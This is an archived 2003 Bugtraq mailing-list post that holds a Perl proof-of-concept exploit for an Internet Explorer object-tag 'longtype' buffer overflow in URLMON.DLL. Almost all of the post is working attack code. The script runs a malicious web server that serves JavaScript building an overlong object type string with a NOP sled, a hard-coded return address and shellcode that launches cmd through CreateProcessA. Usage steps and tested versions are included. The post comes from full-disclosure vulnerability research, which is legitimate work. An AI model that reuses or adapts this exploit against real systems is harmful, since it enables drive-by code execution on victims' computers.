lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20030607043100.10328.qmail@www.securityfocus.com>
Date: 7 Jun 2003 04:31:00 -0000
From: Alumni <alumni@...kz>
To: bugtraq@...urityfocus.com
Subject: IE-object tag longtype exploit




#!/usr/bin/perl

#=synopsis
#	06/06/03 - Proof of concept exploit by Sir Alumni (alumni@...kz)
#	IE-Object longtype dynamic call oferflow
#	[...]
#	url://<$shellcode><'/'x48><jmp %ptr_sh>
#	the flaw actually exists in URLMON.DLL when converting backslashes
#       to wide char,
#	this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
#	[...]
#	
#	To exploit: 	i)  start server perl script;
#			ii) connect to http-service using IE/5.x.
#	Tested: IE-5.x, 6.0? on WinXP.
#	Note:	a) the shellcode size is limited up to 56 bytes;
#		b) the '$ret' may differ as well as the image base of 
KERNEL32.DLL;
#		c) to avoid multiple encoding the shellcode is given 'as 
is' with help of JScript.
#=synopsis

use IO::Socket;

$port = 80;
$server = IO::Socket::INET->new (LocalPort => $port,
				Type =>SOCK_STREAM,
				Reuse => 1,
				Listen => $port) or die("Couldnt't create 
server socket\n");


$shellcode = 	"\x33\xdb".		# xor ebx, ebx
		"\x8b\xd4".		# mov edx, esp
		"\x80\xc6\xff".		# add dh, 0xFF
		"\xc7\x42\xfc\x63\x6d".	# mov dword ptr[edx-4], 0x01646D63 
("cmd\x01")
		"\x64\x01".		#
		"\x88\x5a\xff".		# mov byte ptr[edx-1], bl
		"\x8d\x42\xfc".		# lea eax, [edx-4]
		"\x8b\xf5".		# mov esi, ebp
		"\x56\x52".		# push esi; push edx
		"\x53\x53\x53\x53\x53\x53".	# push ebx
		"\x50\x53".		# push eax; push ebx
		"\xb8\x41\x77\xf7\xbf".	# mov eax, 0xBFF77741 ~= 
CreateProcessA
		"\xff\xd0".		# call eax
		"\xb8\xf8\xd4\xf8\xbf".	# mov eax, 0xBFF8D4F8 ~= 
ExitProcess
		"\xff\xd0".		# call eax
		"\xcc";			# int 3

$nop = "\x90";
$ret = "\\xAB\\x5D\\x58";


while ($client = $server->accept()) {
	while (<$client>) {
		if ($_ =~ /^(\x0D\x0A)/) {

print $client <<END_DATA;
HTTP/1.0 200 Ok\r
Content-Type: text/html\r
\r
&lt;script&gt;\r
	var mins = 56;\r
	var size = 48;\r
	var sploit = "$shellcode";\r
	var strNop = "$nop";\r
	var strObj = '&lt;object type="';\r
	for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
	strObj += sploit;\r
	for (i=0;i<size;i++) strObj += '/';\r
	strObj += "CCCCCCCCDDDDDDDD";\r
	strObj += "$ret";\r
	strObj += '">Hello&lt;/object&gt;';\r
	alert(strObj);\r
	document.write(strObj);\r
&lt;/script&gt;\r
END_DATA
			close($client);

		}
	}
}

close($server);

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ